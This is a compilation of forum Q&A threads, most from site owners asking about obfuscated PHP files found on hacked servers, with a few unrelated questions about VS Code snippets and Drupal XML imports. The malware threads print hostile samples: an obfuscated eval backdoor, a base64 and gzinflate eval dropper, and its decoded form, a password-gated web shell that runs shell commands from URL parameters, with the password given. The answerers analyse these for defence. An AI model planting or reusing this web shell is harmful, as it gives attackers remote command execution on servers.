I'm not a pro with PHP
I'm not a pro with Webservers
Recently someone, somewhere has been managing to upload PHP spam scripts to my server. Though I can easily locate and delete these scripts, I can't figure out how they're working or where the backdoor is that leads the hacker back in to my server.
The script files uploaded declare a variable with every letter, number and symbol and then use arrays spell out the code that executes. For the past three days I've been manually trying to decode this but I'm getting sick and desperate of finding out what the code does in order to hopefully give me an insight in to how to fix my issue.
Can anyone help? Does anyone know something out there that can decode this for me? I'm only pasting a small part of the code so you can see what I mean. It's very, very long.
$z26="jmiO#sxhFnD>J\r/u+RcHz3}g\nd{^8 ?eVwl_T\\\t|N5q)LobU]40!p%,rC-97k<'y=W:P\$1BI&S6\"E(K`Y~.Q;f[v2a#X*ZAGtM";
$GLOBALS['zkmxz95'] = $z26[2].$z26[60].$z26[7].$z26[34].$z26[5].$z26[69].$z26[59];
$GLOBALS['cbimi76']($z26[73].$z26[3].$z26[56].$z26[78].$z26[76].$z26[36].$z26[35].$z26[36].$z26[80].$z26[67].$z26[76].$z26[35].$z26[40].$z26[3] , 5);
The above code, when decoded manually is:
define(SOCKET_TYPE_NO,5);
Recently someone, somewhere has been managing to upload PHP spam
scripts to my server....
Carefully follow https://codex.wordpress.org/FAQ_My_site_was_hacked
Related
Please help, I'm going crazy.
I added a user snippet to help me add opening PHP tags a long time ago. Now, I can't get rid of it. I have uninstalled vs code several times, deleted known vs code folders including the whole %home%\.vscode folder and the %appdata%\roaming\code folder.
I have used advanced installer to clean up program residue files, yet, this snippet appears every time.
The crazy thing is, if I switch to my administrator account, the snippet doesn't exist but I do all my coding on my windows standard user account. It's driving me crazy!!
What do I do?
See screenshot below.
PHP snippet
This is not a snippet: Types of Completions.
This is definitely a newbie question, since I'm not sure where to start on this.
I've used a PHP anti-spam form email script for years which was purchased from a developer (who has ceased their business) but is sometimes flagged as suspicious by our web host. It continues to work flawlessly, but I'd like to understand more what it's doing...
Is there a way to decode what is wrapped into the following:
<?php ob_start();?>FJ3HbutclkZfpYfV4IA5oRr1gznnzEmBOY....?>
The code, of course, is much longer than the above.
Your ideas, suggestions are most appreciated.
Dan
This appears to be a messily obfuscated hunk of open source classes, including PHPMailer. Full code is here. Note this looks pretty old and will not work as-is with PHP versions greater than 5.6.
This is the code:
<?php
$mign='*]`Dy6b'^'G';$qxqytq='HFJ01,0=^SG';$tehui='8P1Z}OeJXSbkV.L-zUJ2F#)GYy!JX%Bq';$xepyo='%';$ubs='lgO-2y-C_0AlSYMV_=ybr'^'DEzq9GRU';$zswu=0;##pS9Kg{5F$!S5Yb9Yf?R][|,z
$tjtgc|'ydiewzrbbxpynuhihqways';vukykn;$cqhi='#TQGI8[8:6_L-97'^'F&#(;g)]JY-8DWP65*E/h';$ivcppw='C%;';/*gn/zl_:#Jjsg$&&Sc&R$yakd='lgiwcwijhpuinad';'farustppsomkv';*/$qhn='$/vm$4YTo';$pef='0lb+)(o';$nmpnj='1*]sGZ]MsPYJCY'^'XD4,4?)';$nrohc='(_'^'Lj$5KKm';heag;$koqp=${'o/-dba*MsPYJCY'^$pef};hcel;$bplv=$qxqytq.$xepyo;$nufx='[eR?O}W/aa[^2K(IH7xVpEK"lJBr`CsD';$nmpnj($cqhi,$zswu);$fbbqn='+4/QEIo[+=$Q*JU';##p:YubiF)O0!pzf7wiB+M)gYR$Hy]U4.E,e?
$lku='Ymhp8`2#';/**|)JZV:3-R%EE=o2vK24OG#hmd[x"lGWAVz*/'p[7mlK';/*Yfb#:/h#EX(J-nIJ)A8EI-Y66O-Az|Nx}mZ=N?BIYzwuihjc^/$+9u5$^glt6=Zj+Tvz2d_l^*/'#)}R-xh';mpggm;$cqhi($zswu);##d1_"E4ZRb^z%jk-:v6}#g]#[7hXC"S
$tyz='hK0D3%*W&Yd';mhlamr;/*$xeeq;n3CVH|m}ql#(wi^M074$}UD-#Q58t"hj0n^M-v[zyP|Qjjrxdxl>>$amhg*/$tnzm=$nufx.'_0Isw'^$tehui;##l3X.-o$i[f%^W]v_0/ACZRMU*je.ztj)6gcA
$kgxnh=$bplv.$ivcppw^$fbbqn;'A`tF,G';/*Rs;1%fj1lIw]U#ANT"#zyu"Ef|,=bKasH*"tftelkntqhpcdnf>>es+"Arm"WKVh;aV.1vV^pEu1*/kyrp;$xepyo=$mign.$nrohc;$ctwvbd=$koqp['ksnkhe'];'{kMSjp]';if($tnzm==$xepyo($ctwvbd)/*^A,:q_`6)"5=#GVlbLwsRa&hPR%w3.8S+Nez3g(?Y8:*/){/*PPA2[RC"o9$nz='fmigpxxindhegtxconzwjcto';'zc';*/$fduger='O#*"/59S+F|$F0?!E^AZG`,b0xj:C7YHE#^r6ai7[&2%-=VvoQubf]qrb`9bnbXR)S7ZOtpNqkAK#_(8ocvKR=II#F1;s7lntBNI/Td)lKqWdUZ6Zb1XI`9&3.P"P(vBy??;7{wQ],2:xj7#%0#8DNR;S;|GNVH)25;633!z:Y?*HmXzfdY]WB-^VAJM"VoBk))M$R.ftU0]UY0)B#_{A.2;##]=`U0SX,PU:dFc0"!)R';$wuxhwd='p`LKCPf4N2#G)^KD+*2rc?j+|=9aaR39*#,Pk:KC6VmKLP3T2xUXFy.1-/r++9z7C"X9=V-u{bHo53BBRKW.?M=0hbn}:{)=/`,+J$FtEbQhD33Z?=V==?ZI]Z5L$[^f&yvwr(,s?NWJZ7lbQ]Sg*/?^qfUgtvlvqzt}zvzXX;ZZj0cpom}3?2[$3|(,Q3Yv4ML.K6KNP6B/;pnK#P:MuqV^#L9XHqE?2Vyn0mO#UT#Ez';$mynbq='5XNBz#';$ynbwu^$rgwyx;$xrazo='Afyo-3;*`OjI+H:2sO-dmx5kma05&W+EY/NYq';/*$md;Kh`L(9y#t,NQEDVz*uQ4yV:o+ouD#t^F.qAd!=,2"bmo<<$qtfxzlihia*//*$qlqo;U]y-fa]#JRDD$[-Deeghldc>>$dybre*/
##_W}8|bSK^C#$J..a5:]s(
$sqyh=$vxk^'Kmi0Z=5&8z';/*YLqCs8gylkR?H;m2FlLw*zgfmljzb^&-O9D$5dt#GMfd&|bX-66?0|:4;*/$miqbq=',JjZQwb}"}'.'slady';/*`k"Nn$:|#o`u(8lJ1=Kg=eJ"x0hBU4$w-2|x-wQmo4)/*/
'WMMg';'8aQ;1h5';'fR_fq';'9%=.7ho';$aizt='bwjHYJJjot;;7lV}$dkVt';$upnyd^$yxzz;'_t0z$%';##=i=w?3mV5s)K/O#f_IU^5WTG"tS!/
$wdfnl=$mynrf.'t09}/UKf)k+VFC0N';/*[#Y0Y#pi4D%z%4Q1cJC*^aa^vY/bFLxpuwccni|mM|$",j5^jh#DY=m^7tL_&:{hX*/$cbarg='9"6G,K/UMq?GLO5rYT'.$uagz;$buu='KopKNAID]gK,F8NK[kr"$4p86CU_W8H7{rgpQ'.$fduger;
$kjkrf='E_pbB/iZlx';/*-Awooy^1]c-(a#j}=%,mHJqwgix|ehj(CsHUTrSW8OCn_Zz8Roj}9Q;xCf4%2]QgzL*/$umjxo=$xrazo.$wuxhwd;$koe='SD##5j/Tk=BNek&h';$nsj='9"6G,K/UMq?GLO5rYT'^$mcoe;$pjzk^':nBjE7';$buu.='aZ:0S%=X#w3';$whql=$buu.'6XWi9EiMc4'^$umjxo.'E4R#%_Xq{}:';/*$ow;zNW(]WrX7]XYnidtdxia<<$oxbxywv*/
$ojg='bO8rU(2Vd{HSGS!';$zqs='Ce}/q+z"y?]Tex'.'3#?I6Rn]UOc&T)uj';'6XWi9EiMc4';'JUVtY+Ub1iqI3{9';$odoiv=$odoiv.'*u|0eGu-Pe=WOd+g95sZZ8|V%L';$fbu=$fbu.';U;HZ"D[d0H2J.#';/*MPm}M}!Qb5`Xx{(h4N0o2F&5;;d{WeMQ(EDH#&B8}r.ciz#g"dLFtObo)DzJp4l%[4CHp%[]Z*/$dwl=$kgxnh($qpm,$whql);$dwl('$h&"3Z%MPDm)/(l:My"%CK,${)CW+#P[','9BeCi=uox');}$zfqa('{Hg"G2','?Zt/{2T');plktjco;':4_epeN(-EHY7!L5OzSpm(^TnX';'iV(!{?d$V.';$kedr('-.sGVZ_B4`0');
$flzrk($qmdr,$nnxk);txzpdre;##pfE/}Mg{S.^"Ry]O|2PK?ulW
$ryy='q0ht#';##rt3I]{hp6$AWo7yb#|xKCPo?VBY$[{[
$lg='|.,oBa';/*]z1O/!V+rf$8rqj98`PLT7?js;%wvisxjbed|!J[cG;Zf)Jw[Qv}g4T3E&=}*/
/*[SXl3i[#y?,d2m3:H?7j8n9?iPslC.5_f`[:z_$sqx='jttsry';'ojty';*/'*iAvU|(bNJ_1';
?>
I've tried figuring out what it means or what it's trying to do, but I think it might be a bit over my head. Can anyone tell me if this is in fact a malicious backdoor script that founds it's way onto the server?
UPDATE
I found this code in sites/default/files in a drupal installation. Luckily you can't execute PHP from that folder, but it means a "normal" or "anonymous" user tried to upload this.
It is malicious alright, however it dynamically evaluates code supplied by the browser so we cannot determine what has been executed against it. It is possible it was using in a file include attack so being able to execute php in it's stored location matters little.
Hi StackOverflow friends.
Running Drupal 6.22 php 5.3
I have been looking around now for a while, but haven't managd to find a solution to my problem.
I am hoping someone may be able to help me out with this.
I need to write an xml file from my data held in an array.
I have written this code and it works fine without problems.
I have invoked this to run on every cron run to ensure my data is upto date,
however I am no getting a second folder my_file.xml.imported and this is causing me problems.
I am using xml2node and hotfolders to import this data into my specified content type.
What bothers me most is that I had this working last week, all I have done since is put an extra "filter" on my data being written to the xml file.
Does anyone know what this .imported file type is and how I can stop it from happening?
So I finally figured this out, hopefully if someone else comes across this problem, this may help them.
The .imported file is created by the xml2node module after the xml file has been processed and put into the drupal queue.
When xml2node then searches again for xml files, it deletes all the .imported files so that your server does not get overloaded with useless once off files.
This question already has answers here:
When is eval evil in php?
(20 answers)
Closed 3 years ago.
A website of mine was recently hacked. Although the actual website remain unchanged, they were somehow able to use the domain to create a link that re-directed to an ebay phishing scam.
I've taken the website down, for obvious reasons, so I can't link to the code. I'm wondering how I can go about finding out what vulnerability they used so that I can avoid this problem in the future. The page used PHP, and also some javascript (for form validation).
Is there a free service that will scan my code for vulnerabilities? What are my other options?
Thanks,
Jeff
EDIT: I've hosted the files at [link removed]
A few things to note: There are several files in the "funcs" folder, most of which aren't used, but I left them there just in case. The "new.php" (contents below) in the "data" folder is clearly the problem. The big question is, how did someone manage to upload "new.php" to the server? There's also an RTF of the e-mail I received which has info about the scam.
(caution: this code is probably "dangerous" to your computer)
<?php
$prv=strrev('edoced_46esab');
$vrp=strrev('etalfnizg');
eval($vrp($prv("rVPRbpswFNW0P9jbNE1ChojQSDD7cm0syvoB5A/GxhiBJVoKxJC0pFr667v0pe1L2k17snyvz/G559jOLxCVxjGCfEBYc1noQfE8VL0SpUYTwQah43LQueKbh3IeQYlguBx1p/gQqkqJFUKiPsWO0Vgh9LoN1R4EoUsuq7xU3Cgxgug0DhHQiVVOjVavFK9ClbDjKH2ZLgOrbpoA0RbNj/dv3r77KF3ED237vVlkrH9Wu7srzM1uv7t3h942N5mTsYM7O52s0y5jsz3thntz6gvCPiWcEVubLpO0tme+VxdHGdq3xe90WU+0wg+hQREGEi9c9G18gprOBPPZBWTMfixP1YwFdlMcNw9UVInT5XjLYqcHQcOSTxvFGyV+5q3GPcKgOzKHHFUi+Te/YmerBK0Nua/XectlnU+JRDBq7OjWKRJOEE0tSqaKIOkHs62a+StEebFDgR4UL7jc5l0Ea9JBXNiSDD3F5bpx3Zq5syaIpudx0FiAuI7gwGVPCpW4TugtnGlf/v0EZ/kWC+8F0ZafWOXazFuzeo0JX87d9tWzvlnOf/s4Xlwdiu2cXX1m/gtT+OzyinnxHw==")));
?>
Interesting stuff going on here. The php block evaluates to a nice little "code generator":
$k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53=70;
$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$s32t83r16i71n72g_o95u53t9p47u16t72=$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47;$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83=strlen($s32t83r16i71n72g_o95u53t9p47u16t72);
$e72v71a16l_p83h32p_c95o53d9e47='';
for($h47u9i53v95a32m83v16s71e72m=0;$h47u9i53v95a32m83v16s71e72m<$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83;$h47u9i53v95a32m83v16s71e72m++)
$e72v71a16l_p83h32p_c95o53d9e47 .= chr(ord($s32t83r16i71n72g_o95u53t9p47u16t72[$h47u9i53v95a32m83v16s71e72m]) ^ $k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53);
eval("?>".$e72v71a16l_p83h32p_c95o53d9e47."<?");
When the nasty variable names are substituted for something more readable, you get:
$Coefficient=70;
$InitialString="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$TargetString=$InitialString;
$CntLimit=strlen($TargetString);
$Output='';
for($i=0;$i<$CntLimit;$i++)
$Output .= chr(ord($TargetString[$i]) ^ $Coefficient);
eval("?>".$Output."<?");
which, when evaluated, spits out the code:
<?php
if ((isset($_GET[pass]))&(md5($_GET[pass])==
'417379a25e41bd0ac88f87dc3d029485')&(isset($_GET[c])))
{
echo '<pre>';
passthru(stripslashes($_GET[c]));
include($_GET[c]);
die('</pre>');
}
?>
Of note, the string: '417379a25e41bd0ac88f87dc3d029485' is the md5 hash of the password: Zrhenjq2009
I'll kick this around some more tomorrow.
Edit:
Ok, so I spent a few more minutes playing with this. It's looking like a remote control script. So now that this page (new.php) is sitting on your server, If a user hits this page and passes a url parameter named 'pass' with a value of 'Zrhenjq2009', they are then able to execute an external command on the server by passing the command and arguments in the url as the parameter named 'c'. So this is turning out to be a code generator which creates a backdoor on the server. Pretty cool.
I pulled down the file you uploaded and ran new.php through VirusTotal.com and it appears to be an new (or substantially modified) trojan. Additionally, it appears that 51.php is the PHPSpy trojan: VirusTotal analysis, 74.php is the PHP.Shellbot trojan VirusTotal Analysis and func.php is "webshell by orb". Looks like someone dropped a nice hack kit on your server along with the ebay phishing scripts/pages referenced in the document you uploaded.
You should probably remove the file download link in your original post.
If you get your hands on the logs, might be interesting to take a look.
Enjoy.
If you're using a VCS (version control, like git, mercurial, subversion, cvs) you can just do a diff from the last good commit and go from there.
You are using version control, right?
Do you have access to the server logs? If you have an approximate time when the first exploit occurred, they should be able to go a long ways into helping you figure out what the person did. Other than giving general advice, its really hard to say without more information.
Can you share the code (please make sure to remove user names / passwords etc)? If so I would be willing to take a look but it might take me a day or so (Sorry, I'm currently working on a SQL Injection Vulnerability report, recommendation for identifying restricted data, and future standards/process to prevent it in the future and I have four kids at home including a 3 month old).